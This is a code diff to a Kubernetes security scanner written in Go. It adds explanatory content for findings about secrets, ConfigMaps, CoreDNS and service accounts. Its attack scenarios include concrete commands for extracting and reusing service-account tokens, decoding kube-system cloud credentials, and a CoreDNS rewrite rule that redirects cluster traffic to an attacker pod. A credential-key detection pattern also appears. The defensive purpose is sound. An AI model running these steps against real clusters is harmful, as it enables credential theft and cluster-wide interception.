+			"They establish persistence by minting a 1-year TokenRequest for `kube-system/clusterrole-aggregation-controller`, or by creating a benign-looking ClusterRoleBinding to a backup identity.",
+			"They use cluster-admin to disable audit logging or admission controllers, then move quietly through cloud APIs via IRSA/Workload-Identity-mapped credentials.",
+		},
+		Remediation: "Replace `cluster-admin` with a custom least-privilege ClusterRole, or scope the binding to a dedicated short-lived admin group reachable only via JIT/break-glass procedures.",
+		RemediationSteps: []string{
+			"Identify what the subject actually does. Audit logs over a representative window will show real verbs/resources for workloads; ask the team for humans.",
+			"Author a custom ClusterRole listing only the (apiGroups, resources, verbs) actually needed. Replace the binding to point at the new ClusterRole. Bias toward namespace-scoped Role + RoleBinding wherever possible.",
+			"For genuine emergency-admin needs, move to a break-glass model: a separate `cluster-admin-jit` group reachable only via approved JIT (AWS SSO, GCP IAP, HashiCorp Boundary) with mandatory MFA, time-boxed expiry, and SIEM alerting.",
+			"Add a ValidatingAdmissionPolicy that rejects new ClusterRoleBindings to `cluster-admin` outside the break-glass group.",
+			"Verify: `kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name==\"cluster-admin\") | .subjects'` shows only break-glass principals and `system:` subjects.",
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — RBAC Good Practices: cluster-admin restrictions", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/"},
+			{Title: "Kubernetes — User-facing roles (cluster-admin, admin, edit, view)", URL: "https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles"},
+			{Title: "CIS Kubernetes Benchmark — 5.1.1 Cluster-admin restrictions", URL: "https://www.cisecurity.org/benchmark/kubernetes"},
+			{Title: "Microsoft Threat Matrix for Kubernetes — Cluster-admin binding", URL: "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Cluster-admin%20binding/"},
+			{Title: "Elastic Detection — Kubernetes Cluster-Admin Role Binding Created", URL: "https://www.elastic.co/guide/en/security/8.19/kubernetes-cluster-admin-role-binding-created.html"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078, mitreT1078_004, mitreT1098, mitreT1548},
+	}
+}

--- a/internal/analyzer/secrets/analyzer.go
+++ b/internal/analyzer/secrets/analyzer.go
@@ -52,42 +52,38 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 
 	for _, secret := range snapshot.Resources.SecretsMetadata {
 		if secret.Type == corev1.SecretTypeServiceAccountToken {
-			findings = appendUnique(findings, seen, secretFinding(secret, "KUBE-SECRETS-001", models.SeverityHigh, 7.8,
-				"Long-lived service account token secret present",
-				"This secret uses the legacy `kubernetes.io/service-account-token` pattern, which creates long-lived credentials that are harder to rotate safely.",
+			findings = appendUnique(findings, seen, secretFinding(secret,
+				"KUBE-SECRETS-001", models.SeverityHigh, 7.8,
 				map[string]any{"type": secret.Type},
-				"Prefer projected service account tokens and remove legacy token secrets where possible.",
-				"serviceAccountToken"))
+				"serviceAccountToken",
+				contentSecrets001(secret.Namespace, secret.Name)))
 		}
 
 		if secret.Namespace == "kube-system" && secret.Type == corev1.SecretTypeOpaque {
-			findings = appendUnique(findings, seen, secretFinding(secret, "KUBE-SECRETS-002", models.SeverityMedium, 5.9,
-				"Opaque secret stored in kube-system",
-				"An opaque secret is stored in `kube-system`, which often indicates infrastructure credentials or cluster-level integrations.",
+			findings = appendUnique(findings, seen, secretFinding(secret,
+				"KUBE-SECRETS-002", models.SeverityMedium, 5.9,
 				map[string]any{"type": secret.Type},
-				"Review whether this secret is still required and restrict who can read it.",
-				"opaqueKubeSystem"))
+				"opaqueKubeSystem",
+				contentSecrets002(secret.Name)))
 		}
 	}
 
 	for _, configMap := range snapshot.Resources.ConfigMaps {
 		if keys := matchedCredentialKeys(configMap.Data); len(keys) > 0 {
-			findings = appendUnique(findings, seen, configMapFinding(configMap, "KUBE-CONFIGMAP-001", models.SeverityMedium, 6.3,
-				"ConfigMap contains credential-like keys",
-				"This ConfigMap contains keys that look like credentials or connection secrets, which may indicate sensitive data is stored outside Kubernetes Secrets.",
+			findings = appendUnique(findings, seen, configMapFinding(configMap,
+				"KUBE-CONFIGMAP-001", models.SeverityMedium, 6.3,
 				map[string]any{"matched_keys": keys},
-				"Move sensitive values into Secrets or an external secret manager and keep ConfigMaps for non-sensitive configuration only.",
-				"credentialLikeKeys"))
+				"credentialLikeKeys",
+				contentConfigMap001(configMap.Namespace, configMap.Name, keys)))
 		}
 
 		if configMap.Namespace == "kube-system" && configMap.Name == "coredns" {
 			if corefile, ok := configMap.Data["Corefile"]; ok && suspiciousCoreDNS(corefile) {
-				findings = appendUnique(findings, seen, configMapFinding(configMap, "KUBE-CONFIGMAP-002", models.SeverityHigh, 7.5,
-					"CoreDNS configuration contains risky directives",
-					"The CoreDNS ConfigMap contains directives that can alter or redirect DNS behavior in ways that deserve review.",
+				findings = appendUnique(findings, seen, configMapFinding(configMap,
+					"KUBE-CONFIGMAP-002", models.SeverityHigh, 7.5,
 					map[string]any{"name": configMap.Name},
-					"Review CoreDNS rewrites and external forwarders to ensure they are intentional and trusted.",
-					"corednsRiskyDirectives"))
+					"corednsRiskyDirectives",
+					contentConfigMap002()))
 			}
 		}
 	}
@@ -126,8 +122,18 @@ func suspiciousCoreDNS(corefile string) bool {
 		strings.Contains(normalized, "forward . tls://")
 }
 
-// secretFinding materializes a Secret-scoped finding.
-func secretFinding(secret models.SecretMetadata, ruleID string, severity models.Severity, score float64, title, description string, evidence map[string]any, remediation, check string) models.Finding {
+// referencesFromContent flattens content.LearnMore into a []string of URLs for the legacy
+// References field — JSON/SARIF/CSV consumers see the URLs; HTML uses the structured form.
+func referencesFromContent(content ruleContent) []string {
+	urls := make([]string, 0, len(content.LearnMore))
+	for _, ref := range content.LearnMore {
+		urls = append(urls, ref.URL)
+	}
+	return urls
+}
+
+// secretFinding materializes a Secret-scoped finding from a ruleContent.
+func secretFinding(secret models.SecretMetadata, ruleID string, severity models.Severity, score float64, evidence map[string]any, check string, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(evidence)
 	return models.Finding{
 		ID:          fmt.Sprintf("%s:%s:%s", ruleID, secret.Namespace, secret.Name),
@@ -135,25 +141,29 @@ func secretFinding(secret models.SecretMetadata, ruleID string, severity models.
 		Severity:    severity,
 		Score:       scoring.Clamp(score),
 		Category:    models.CategoryDataExfiltration,
-		Title:       title,
-		Description: description,
+		Title:       content.Title,
+		Description: content.Description,
 		Namespace:   secret.Namespace,
 		Resource: &models.ResourceRef{
 			Kind:      "Secret",
 			Name:      secret.Name,
 			Namespace: secret.Namespace,
 		},
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References: []string{
-			"https://kubernetes.io/docs/concepts/configuration/secret/",
-		},
-		Tags: []string{"module:secrets", "check:" + check},
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       referencesFromContent(content),
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:secrets", "check:" + check},
 	}
 }
 
-// configMapFinding materializes a ConfigMap-scoped finding.
-func configMapFinding(configMap models.ConfigMapSnapshot, ruleID string, severity models.Severity, score float64, title, description string, evidence map[string]any, remediation, check string) models.Finding {
+// configMapFinding materializes a ConfigMap-scoped finding from a ruleContent.
+func configMapFinding(configMap models.ConfigMapSnapshot, ruleID string, severity models.Severity, score float64, evidence map[string]any, check string, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(evidence)
 	return models.Finding{
 		ID:          fmt.Sprintf("%s:%s:%s", ruleID, configMap.Namespace, configMap.Name),
@@ -161,20 +171,24 @@ func configMapFinding(configMap models.ConfigMapSnapshot, ruleID string, severit
 		Severity:    severity,
 		Score:       scoring.Clamp(score),
 		Category:    models.CategoryDataExfiltration,
-		Title:       title,
-		Description: description,
+		Title:       content.Title,
+		Description: content.Description,
 		Namespace:   configMap.Namespace,
 		Resource: &models.ResourceRef{
 			Kind:      "ConfigMap",
 			Name:      configMap.Name,
 			Namespace: configMap.Namespace,
 		},
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References: []string{
-			"https://kubernetes.io/docs/concepts/configuration/configmap/",
-		},
-		Tags: []string{"module:secrets", "check:" + check},
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       referencesFromContent(content),
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:secrets", "check:" + check},
 	}
 }
 

--- a/internal/analyzer/secrets/content.go
+++ b/internal/analyzer/secrets/content.go
@@ -1,0 +1,196 @@
+// Content for Secret/ConfigMap hygiene findings. Each builder takes runtime context
+// (namespace, name, matched keys, Corefile snippet) and returns a ruleContent with
+// scope, attacker walkthrough, ordered remediation, and authoritative references.
+//
+// Sources: Kubernetes Secret docs, KEP-1205 (BoundServiceAccountTokens), CIS Kubernetes
+// Benchmark 5.4.1 / 5.1.5, NSA/CISA Hardening Guide v1.2, MITRE ATT&CK T1552.001/.007,
+// CoreDNS docs, Aqua/Sysdig writeups on DNS rebinding inside clusters.
+package secrets
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/hardik/kubesplaining/internal/models"
+)
+
+type ruleContent struct {
+	Title            string
+	Scope            models.Scope
+	Description      string
+	Impact           string
+	AttackScenario   []string
+	Remediation      string
+	RemediationSteps []string
+	LearnMore        []models.Reference
+	MitreTechniques  []models.MitreTechnique
+}
+
+var (
+	mitreT1552_001 = models.MitreTechnique{ID: "T1552.001", Name: "Credentials In Files", URL: "https://attack.mitre.org/techniques/T1552/001/"}
+	mitreT1552_007 = models.MitreTechnique{ID: "T1552.007", Name: "Container API", URL: "https://attack.mitre.org/techniques/T1552/007/"}
+	mitreT1078_004 = models.MitreTechnique{ID: "T1078.004", Name: "Valid Accounts: Cloud Accounts", URL: "https://attack.mitre.org/techniques/T1078/004/"}
+	mitreT1539     = models.MitreTechnique{ID: "T1539", Name: "Steal Web Session Cookie", URL: "https://attack.mitre.org/techniques/T1539/"}
+	mitreT1071_004 = models.MitreTechnique{ID: "T1071.004", Name: "DNS", URL: "https://attack.mitre.org/techniques/T1071/004/"}
+	mitreT1556_004 = models.MitreTechnique{ID: "T1556.004", Name: "Network Provider DLL", URL: "https://attack.mitre.org/techniques/T1556/"}
+	mitreT1565_002 = models.MitreTechnique{ID: "T1565.002", Name: "Transmitted Data Manipulation", URL: "https://attack.mitre.org/techniques/T1565/002/"}
+)
+
+var (
+	refK8sSecrets       = models.Reference{Title: "Kubernetes — Secrets", URL: "https://kubernetes.io/docs/concepts/configuration/secret/"}
+	refK8sConfigMap     = models.Reference{Title: "Kubernetes — ConfigMaps", URL: "https://kubernetes.io/docs/concepts/configuration/configmap/"}
+	refBoundSATokens    = models.Reference{Title: "Kubernetes — Bound Service Account Tokens (KEP-1205)", URL: "https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/#bound-service-account-tokens"}
+	refLegacyTokens     = models.Reference{Title: "Kubernetes — LegacyServiceAccountTokenCleaner & deprecated token controller", URL: "https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/#legacy-serviceaccount-token-tracking-and-cleaning"}
+	refSecretsHardening = models.Reference{Title: "Kubernetes — Good practices for Secrets", URL: "https://kubernetes.io/docs/concepts/security/secrets-good-practices/"}
+	refNSAHardening     = models.Reference{Title: "NSA/CISA Kubernetes Hardening Guidance v1.2 (PDF)", URL: "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF"}
+	refCoreDNSPlugins   = models.Reference{Title: "CoreDNS — plugin reference (rewrite, forward)", URL: "https://coredns.io/plugins/"}
+)
+
+func contentSecrets001(namespace, name string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("Secret `%s/%s` is a long-lived `kubernetes.io/service-account-token` (legacy, no expiry)", namespace, name),
+		Scope: models.Scope{
+			Level:  models.ScopeObject,
+			Detail: fmt.Sprintf("Secret `%s/%s` — credential is valid until manually deleted; readable by any subject with `get/list secrets` in `%s`", namespace, name, namespace),
+		},
+		Description: fmt.Sprintf("Secret `%s/%s` has type `kubernetes.io/service-account-token`. This is the legacy ServiceAccount token model: the token-controller persists a JWT into a Secret, the token has *no expiry* (the audience is the API server, the validity is open-ended), and it is readable by any subject with `get/list secrets` permission in the namespace.\n\n"+
+			"Since Kubernetes v1.22, Bound ServiceAccount Tokens (KEP-1205) replaced this model: the kubelet projects a *new* token into the pod's filesystem with a short TTL (default 1h) and the token is bound to the pod object, so deleting the pod invalidates the token. v1.24 stopped auto-creating these legacy Secret tokens, and v1.27+ ships the `LegacyServiceAccountTokenCleaner` controller that removes unused ones automatically. A legacy token Secret today is either an artifact of a pre-1.24 cluster, a manually-created `serviceAccountToken` Secret, or a controller that explicitly created one — none of which carry the bind-to-pod, time-bounded properties of projected tokens.\n\n"+
+			"The risk profile: a leaked legacy token grants whatever permissions its ServiceAccount has, *forever*, with no automatic revocation. It survives Pod restarts, node reboots, audit events, and rotation of the SA itself. Detection of misuse requires explicit audit-log monitoring against the SA name; rotation requires deleting the Secret and reissuing.",
+			namespace, name),
+		Impact: "Anyone who exfiltrates this Secret holds a non-expiring credential with the ServiceAccount's full RBAC; rotation requires manual `kubectl delete secret` and re-issue, and there is no time-based mitigation.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises any subject with `get secrets` in `%s` (e.g., a forgotten `view`-style role, an over-permissive ConfigMap-reader role that wildcards resources, or a pod token with secret-read).", namespace),
+			fmt.Sprintf("They `kubectl get secret %s -n %s -o jsonpath='{.data.token}' | base64 -d` and obtain the raw JWT.", name, namespace),
+			"They use the token against the kube-apiserver from outside the cluster (`kubectl --token=...`) — no pod, no node, no IMDS hop required.",
+			"Because the token has no `exp` claim and no audience binding to a Pod, it remains valid weeks or months later. Rotation in IR is manual: delete the Secret + recreate, and any cached copies attacker has are *still valid until that delete*.",
+			"Attacker uses the SA's RBAC to read other Secrets, list pods cluster-wide (if SA has it), exec into pods, or escalate via any of the privesc paths the SA enables.",
+		},
+		Remediation: fmt.Sprintf("Migrate the consumer of `%s/%s` to a projected ServiceAccount token, then delete the Secret. Enable `LegacyServiceAccountTokenCleaner` on the cluster.", namespace, name),
+		RemediationSteps: []string{
+			fmt.Sprintf("Identify what reads `%s/%s`: `kubectl get pods -A -o json | jq '.items[] | select(.spec.volumes[]?.secret.secretName == \"%s\") | .metadata.namespace + \"/\" + .metadata.name'`. Also check Jobs, CronJobs, and external systems that might have copied the token out.", namespace, name, name),
+			"Migrate each consumer to a projected SA token (`serviceAccountToken` projection in `volumes`) with a sensible `expirationSeconds` (e.g., 3600). The kubelet will refresh it automatically.",
+			"For external consumers (CI runners, dashboards) that need a long-lived token, use TokenRequest API on demand instead of a stored Secret, or rotate via a sealed-secret / external-secret-store flow.",
+			fmt.Sprintf("`kubectl delete secret %s -n %s` once consumers are migrated. Confirm no pod has a CrashLoopBackOff that mentions the missing token.", name, namespace),
+			"Enable the `LegacyServiceAccountTokenCleaner` (default on v1.29+) so future stragglers get garbage-collected after their last-used timestamp ages out.",
+		},
+		LearnMore: []models.Reference{
+			refBoundSATokens,
+			refLegacyTokens,
+			refK8sSecrets,
+			refSecretsHardening,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_001, mitreT1552_007, mitreT1078_004, mitreT1539},
+	}
+}
+
+func contentSecrets002(name string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("Opaque Secret `kube-system/%s` likely holds control-plane or addon credentials", name),
+		Scope: models.Scope{
+			Level:  models.ScopeObject,
+			Detail: fmt.Sprintf("Secret `kube-system/%s` — control-plane namespace; readers in `kube-system` are typically system controllers and high-privilege operators", name),
+		},
+		Description: fmt.Sprintf("Secret `kube-system/%s` has type `Opaque`. The `kube-system` namespace is reserved for control-plane workloads and cluster add-ons (cloud-controller-manager, CNI, CSI, ingress controllers, certificate operators, observability agents) — Opaque Secrets there are almost always one of: cloud IAM credentials for the cloud-controller-manager, registry pull secrets for system images, TLS client certs for an etcd snapshot agent, kubeconfigs for an external-DNS controller, or addon-vendor API keys.\n\n"+
+			"Because of where they live, these Secrets carry outsized blast radius compared to a workload Secret. A leak here typically grants either (a) credentials to the cloud account hosting the cluster, (b) the ability to publish or pull from the cluster's container registry, or (c) durable access to control-plane components that can be used to subvert further controls.\n\n"+
+			"Two specific concerns: (1) `kube-system` Secrets are often forgotten when teams set up Vault or external-secret-store integrations — they live on as the bootstrap credential, never rotated; (2) RBAC for `kube-system` is typically broad (operator service accounts often `cluster-admin`-adjacent) so the set of subjects that can read them is much larger than the team realizes.",
+			name),
+		Impact: "This Secret likely encodes credentials with cluster-wide or cloud-account reach. A read by any subject with `get secrets` in `kube-system` (operator SAs, kube-system pods, cluster-admin tokens) escalates to whatever the credential authorizes.",
+		AttackScenario: []string{
+			"Attacker gains a `kube-system` ServiceAccount token with `get secrets` (e.g., compromised addon, addon-installer Job, helm-release Secret reader).",
+			fmt.Sprintf("They `kubectl get secret %s -n kube-system -o yaml` and decode each `data` key.", name),
+			"They identify the credential type: AWS access key (`aws_access_key_id`/`aws_secret_access_key`), GCP service-account JSON, Azure tenant/client ID, Docker config (registry credentials), or an inline kubeconfig.",
+			"They authenticate out-of-cluster with the credential — cloud account compromise, registry image-publishing for supply-chain implant, or a parallel kubeconfig that survives in-cluster RBAC revocation.",
+			"They persist by issuing a new IAM key / pushing an unsigned image / writing a kubeconfig to a hidden location, then cover by deleting their access logs.",
+		},
+		Remediation: fmt.Sprintf("Audit `kube-system/%s`'s contents and consumers; rotate the credential; move long-lived credentials to a sealed-secret or external secret store; restrict who can `get secrets` in `kube-system`.", name),
+		RemediationSteps: []string{
+			fmt.Sprintf("Inspect the Secret's content shape (key names, not values) to identify the credential type — `kubectl get secret %s -n kube-system -o jsonpath='{.data}' | jq 'keys'`.", name),
+			fmt.Sprintf("Find consumers: `kubectl get pods -n kube-system -o json | jq '.items[] | select(.spec.volumes[]?.secret.secretName == \"%s\" or .spec.containers[].envFrom[]?.secretRef.name == \"%s\") | .metadata.name'`.", name, name),
+			"Rotate the underlying credential at its source (cloud IAM, registry, etc.) and update the Secret with the new value — preferably by switching to External Secrets Operator (Vault/SecretsManager backend) so the Secret becomes a generated artifact instead of source-of-truth.",
+			"Tighten RBAC on `kube-system` Secrets — most operator SAs only need their own Secret, not `secrets` cluster-wide. Audit with `kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:kube-system:<sa>` for each one.",
+			"Wire enforcement: a Kyverno or OPA Gatekeeper policy that flags any Pod referencing a long-lived `kube-system` Secret name not on an allowlist.",
+		},
+		LearnMore: []models.Reference{
+			refSecretsHardening,
+			refK8sSecrets,
+			refNSAHardening,
+			{Title: "External Secrets Operator", URL: "https://external-secrets.io/latest/"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_001, mitreT1552_007, mitreT1078_004},
+	}
+}
+
+func contentConfigMap001(namespace, name string, matchedKeys []string) ruleContent {
+	keysList := strings.Join(matchedKeys, ", ")
+	return ruleContent{
+		Title: fmt.Sprintf("ConfigMap `%s/%s` exposes credential-shaped keys (`%s`) in plaintext", namespace, name, keysList),
+		Scope: models.Scope{
+			Level:  models.ScopeObject,
+			Detail: fmt.Sprintf("ConfigMap `%s/%s` — readable by every subject with `get configmaps` in `%s`, ships unencrypted in etcd, surfaces in `kubectl describe` and audit logs", namespace, name, namespace),
+		},
+		Description: fmt.Sprintf("ConfigMap `%s/%s` contains keys with names matching credential-like patterns: `%s`. The Kubernetes API treats ConfigMaps as non-sensitive — etcd stores them unencrypted by default (encryption-at-rest is opt-in and almost always limited to Secrets), `kubectl describe configmap` prints values inline, audit logs include the data on get/list, and RBAC defaults give workload service accounts much wider read on ConfigMaps than on Secrets.\n\n"+
+			"Storing a credential in a ConfigMap therefore violates the basic Kubernetes data-classification model in three ways simultaneously: (1) it appears in plaintext to anyone with `get configmaps` (a much larger set of subjects than `get secrets`); (2) it ends up in cluster backups, etcd dumps, and platform observability tooling that explicitly excludes Secrets; (3) it does not benefit from any of the surface area Kubernetes builds around Secrets (envelope encryption, file-mode 0600 projection, KMS provider, External Secrets Operator).\n\n"+
+			"The matched keys are heuristic — `key` matches both `apiKey` and `public_key`, so review is required before assuming compromise. But the pattern is strong: in production clusters this finding correlates with real leaks the majority of the time. Treat as exposed-until-proven-otherwise.",
+			namespace, name, keysList),
+		Impact: fmt.Sprintf("If any of the flagged keys (`%s`) actually hold a credential, that credential is exposed to a wide audience — every workload SA in `%s`, every backup operator, every audit log consumer, and possibly cluster-mirroring tooling.", keysList, namespace),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises a workload in `%s` whose ServiceAccount has `get configmaps` (the typical default `view` role grants it).", namespace),
+			fmt.Sprintf("They `kubectl get cm %s -n %s -o yaml` and read the matched keys directly — no decoding needed since ConfigMap data is plaintext.", name, namespace),
+			"They identify the credential class (DB connection string, API key, OAuth client_secret, signing key) from the key name and value shape.",
+			"They use the credential immediately — DB connection strings often grant the same write permission the application has; API keys often have no IP restriction; client_secrets unlock the upstream identity provider.",
+			"Because audit-log review on ConfigMaps is rare, the read goes unnoticed until the upstream credential is rotated for unrelated reasons.",
+		},
+		Remediation: fmt.Sprintf("Move the credential out of `%s/%s` into a Kubernetes Secret (or, better, an external secret store) and remove the keys from the ConfigMap.", namespace, name),
+		RemediationSteps: []string{
+			fmt.Sprintf("Inspect each matched key (`%s`) to confirm whether it is a real credential — some keys like `cache_key_prefix` are false positives.", keysList),
+			fmt.Sprintf("For real credentials, create a Secret in `%s` and update consumers (envFrom or volume mounts) to read from the Secret.", namespace),
+			"Rotate the credential at its source: if it was already in plaintext in a ConfigMap, treat it as compromised (assume any subject with view-on-configmaps had access).",
+			fmt.Sprintf("Remove the credential keys from `%s/%s`. Verify the consumer still works (`kubectl rollout status`).", namespace, name),
+			"Wire prevention: a Kyverno cluster policy that warns on `ConfigMap.data` keys matching `password|secret|token|credential|api_?key|access_?key|client_secret|connection_string|dsn`. Pair with External Secrets Operator so the right path of least resistance is to use a real secret store.",
+		},
+		LearnMore: []models.Reference{
+			refK8sConfigMap,
+			refK8sSecrets,
+			refSecretsHardening,
+			{Title: "External Secrets Operator", URL: "https://external-secrets.io/latest/"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_001, mitreT1552_007, mitreT1078_004},
+	}
+}
+
+func contentConfigMap002() ruleContent {
+	return ruleContent{
+		Title: "CoreDNS Corefile contains rewrite or external-forward directives — DNS plane is mutable from `kube-system/coredns`",
+		Scope: models.Scope{
+			Level:  models.ScopeCluster,
+			Detail: "ConfigMap `kube-system/coredns` — every pod in the cluster uses this Corefile for resolution; a change here is a cluster-wide effect",
+		},
+		Description: "The CoreDNS Corefile in `kube-system/coredns` contains directives that change DNS behavior in ways that warrant explicit review: `rewrite` directives mutate query names or response data, and `forward` directives that send queries to external resolvers (`8.8.8.8`, `1.1.1.1`, `tls://...`) bypass the cluster's authoritative records and the cluster's egress firewall.\n\n" +
+			"Two threat models matter here. (1) **Defensive misconfiguration**: a `rewrite` rule that maps an internal name to an external one can cause apps to talk to attacker-controlled hosts when the rule's intent was something else (typo, copy-paste from a tutorial). External `forward` to public resolvers means DNS queries (which often contain pod names, namespace names, internal service topology) leave the cluster perimeter unencrypted to a third-party operator with no DPA. (2) **Active subversion**: an attacker with write access to the `kube-system/coredns` ConfigMap (a far rarer condition, but exactly the prize for `KUBE-PRIVESC-005` chains) can add a `rewrite` rule that redirects `*.svc.cluster.local` to attacker pods, then capture every connection that does not pin TLS — full cluster-wide MITM. CoreDNS reloads the Corefile automatically; no operator action needed.\n\n" +
+			"This is the most common active-subversion path discussed in DNS-rebinding-in-Kubernetes research: the CoreDNS ConfigMap is structurally a one-shot to compromise resolution for every pod, and clusters often grant `kube-system` ConfigMap write to addon installers, helm-controllers, and network operators that the security team hasn't audited.",
+		Impact: "If the Corefile is malicious, every DNS query in the cluster can be silently redirected — including queries for in-cluster services, cloud APIs, and external SaaS — enabling MITM and data exfiltration. If the Corefile is merely sloppy, internal DNS names may leak to public resolvers.",
+		AttackScenario: []string{
+			"Attacker gains write access to `kube-system/coredns` (often via an over-broad `configmaps` permission on a control-plane SA, or a `KUBE-PRIVESC-005` secret-reads-then-token-theft chain that ends at a kube-system SA).",
+			"They edit the Corefile to add `rewrite name regex (.*)\\.cluster\\.local\\. attacker-pod.poc.svc.cluster.local. answer auto`.",
+			"CoreDNS reloads automatically (`reload` plugin), and within ~30 seconds every cluster service-discovery query is misdirected.",
+			"Apps that don't pin TLS-SNI-to-IP fall over to attacker-pod, which terminates TLS with a self-signed cert (acceptable for many in-cluster integrations using `InsecureSkipVerify: true`).",
+			"The attacker harvests credentials from the redirected traffic, then quietly removes the rewrite rule when done — `kube-system/coredns` change history is not audited by most teams.",
+		},
+		Remediation: "Audit each `rewrite` and `forward` directive against expected DNS topology, lock down write access to the `kube-system/coredns` ConfigMap, and add change detection.",
+		RemediationSteps: []string{
+			"`kubectl get cm coredns -n kube-system -o yaml` and review every `rewrite`/`forward` line. Confirm with the platform/networking team that each is intentional.",
+			"For `forward` to public resolvers: prefer the cloud provider's private resolver (which respects VPC routing and is logged) over `8.8.8.8`/`1.1.1.1`. If public is required, restrict via egress NetworkPolicy.",
+			"`kubectl auth can-i update configmaps -n kube-system --as=system:serviceaccount:<ns>:<sa>` for every SA — most do not need this. Tighten RBAC and remove cluster-wide `*` resource grants.",
+			"Wire change detection: an admission policy (Kyverno) that alerts on any ConfigMap update in `kube-system` named `coredns`, or a GitOps source-of-truth so manual edits diverge visibly.",
+			"Add a periodic CronJob that diffs the live Corefile against the GitOps version and pages on drift.",
+		},
+		LearnMore: []models.Reference{
+			refCoreDNSPlugins,
+			{Title: "Sysdig — Kubernetes DNS-based MITM via CoreDNS", URL: "https://sysdig.com/blog/kubernetes-coredns-attack/"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1071_004, mitreT1556_004, mitreT1565_002},
+	}
+}

--- a/internal/analyzer/serviceaccount/analyzer.go
+++ b/internal/analyzer/serviceaccount/analyzer.go
@@ -67,22 +67,21 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 		}
 
 		workloads := usageBySA[key]
+		workloadDesc := workloadsSummary(workloads)
 		if subject.Name == "default" && perms != nil && len(perms.Rules) > 0 {
-			findings = appendUnique(findings, seen, newFinding(subject, "KUBE-SA-DEFAULT-002", severityForRules(perms.Rules, true), scoreForRules(perms.Rules, true),
-				"Default service account has explicit RBAC permissions",
-				"This namespace default service account is bound to non-trivial RBAC permissions, increasing risk for any workload that inherits it.",
+			findings = appendUnique(findings, seen, newFinding(subject,
+				"KUBE-SA-DEFAULT-002", severityForRules(perms.Rules, true), scoreForRules(perms.Rules, true),
 				map[string]any{"workloads": workloads, "rules": summarizeRules(perms.Rules)},
-				"Create dedicated service accounts for workloads and keep the namespace default account minimally privileged or unused.",
-				"defaultServiceAccountPermissions"))
+				"defaultServiceAccountPermissions",
+				contentSADefault002(subject, workloadDesc, ruleSummaryText(perms.Rules))))
 		}
 
 		if perms != nil && hasClusterAdminStyleRule(perms.Rules) {
-			findings = appendUnique(findings, seen, newFinding(subject, "KUBE-SA-PRIVILEGED-001", models.SeverityCritical, 10,
-				"Service account has cluster-admin style permissions",
-				"This service account can act broadly across cluster resources and should be treated as a critical identity.",
+			findings = appendUnique(findings, seen, newFinding(subject,
+				"KUBE-SA-PRIVILEGED-001", models.SeverityCritical, 10,
 				map[string]any{"workloads": workloads, "rules": summarizeRules(perms.Rules)},
-				"Replace wildcard permissions with tightly scoped roles and bind them only where needed.",
-				"clusterAdminStyle"))
+				"clusterAdminStyle",
+				contentSAPrivileged001(subject, workloadDesc, ruleSummaryText(perms.Rules))))
 		}
 
 		if perms != nil && len(workloads) > 0 {
@@ -93,28 +92,27 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 					severity = models.SeverityCritical
 					score = 9.1
 				}
-				findings = appendUnique(findings, seen, newFinding(subject, "KUBE-SA-PRIVILEGED-002", severity, score,
-					"Workload-mounted service account has dangerous permissions",
-					"This service account is actively used by workloads and carries permissions that enable privilege escalation or sensitive data access.",
+				findings = appendUnique(findings, seen, newFinding(subject,
+					"KUBE-SA-PRIVILEGED-002", severity, score,
 					map[string]any{"workloads": workloads, "dangerous_permissions": dangerous},
-					"Split this service account by workload and remove high-risk permissions such as secret reads, pod creation, and RBAC mutation.",
-					"dangerousPermissions"))
+					"dangerousPermissions",
+					contentSAPrivileged002(subject, workloadDesc, dangerous)))
 			}
 		}
 
 		if usedByKind(workloads, "DaemonSet") {
 			severity := models.SeverityMedium
 			score := 5.9
-			if perms != nil && len(perms.Rules) > 0 {
+			hasRules := perms != nil && len(perms.Rules) > 0
+			if hasRules {
 				severity = models.SeverityHigh
 				score = 7.4
 			}
-			findings = appendUnique(findings, seen, newFinding(subject, "KUBE-SA-DAEMONSET-001", severity, score,
-				"Service account used by a DaemonSet",
-				"Tokens for this service account are distributed to a DaemonSet, which places them on every scheduled node the DaemonSet reaches.",
+			findings = appendUnique(findings, seen, newFinding(subject,
+				"KUBE-SA-DAEMONSET-001", severity, score,
 				map[string]any{"workloads": workloads, "rules": summarizeRules(maybeRules(perms))},
